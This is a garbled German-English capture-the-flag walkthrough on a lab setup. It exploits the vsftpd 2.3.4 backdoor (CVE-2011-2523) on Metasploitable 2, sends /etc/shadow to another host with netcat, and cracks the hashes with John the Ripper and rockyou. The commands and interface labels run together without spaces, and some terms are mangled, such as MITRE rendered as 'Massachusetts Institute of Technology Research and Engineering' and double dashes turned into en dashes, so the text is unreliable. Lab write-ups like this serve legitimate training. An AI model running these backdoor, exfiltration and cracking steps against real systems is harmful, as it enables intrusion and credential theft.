
Erfasse die entschlüsselten Dateien /etc/shadow und /etc/passwd vom verwundbaren Metasploitable-2-Server.
Für diese CTF verwenden wir VMware Workstation Pro mit zwei virtuellen Maschinen. Wir nutzen Kali Linux als Angreifer-Maschine und Metasploitable 2 als verwundbare Maschine.
Open a Virtual Machine in VMware Workstation und wählen Sie die entpackte Kali-Linux-Datei ausopen, dann wählen Sie die entpackte Metasploitable-2-Datei ausPlay virtual machineI moved It oder I copied It zu wählen, wählen Sie die Option I copied Itkali als Benutzername und Passwort anmsfadmin als Benutzername und Passwort anip addr show aus und notieren Sie die IP-Adresse des Abschnitts inetMassachusetts Institute of Technology Research and Engineering beschreibt CVE-2011-2523 als eine allgemeine Schwachstelle, bei der vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.
nmap <vulnerable-machine-ip-address>nc <vulnerable-machine-ip-address> 21:) am Ende. Geben Sie user <string>:) einpass <string> nc -v <vulnerable-machine-ip-address> 6200ip addr showwhoami, dass Root-Zugriff gewährt wurde/etc/shadow und /etc/passwd in eine andere Dateicp /etc/shadow shadow.txtcp /etc/passwd passwd.txtinet mit dem Befehl ip addr shownc -l -p 1234 > shadow.txt auf Dateiennc -w 3 <destination-ip> 1234 < shadow.txtJohn-Tool-Formatunshadow passwd.txt shadow.txt > unshadowed-inputcat unshadowed-input an; sie sollte Benutzername und Passwort enthaltenJohn und einer Wortlisterockyou.txt, um Hashes mit John zu knackensudo gzip -d /usr/share/wordlists/rockyou.txt.gzkalijohn unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txtjohn –show unshadowed-input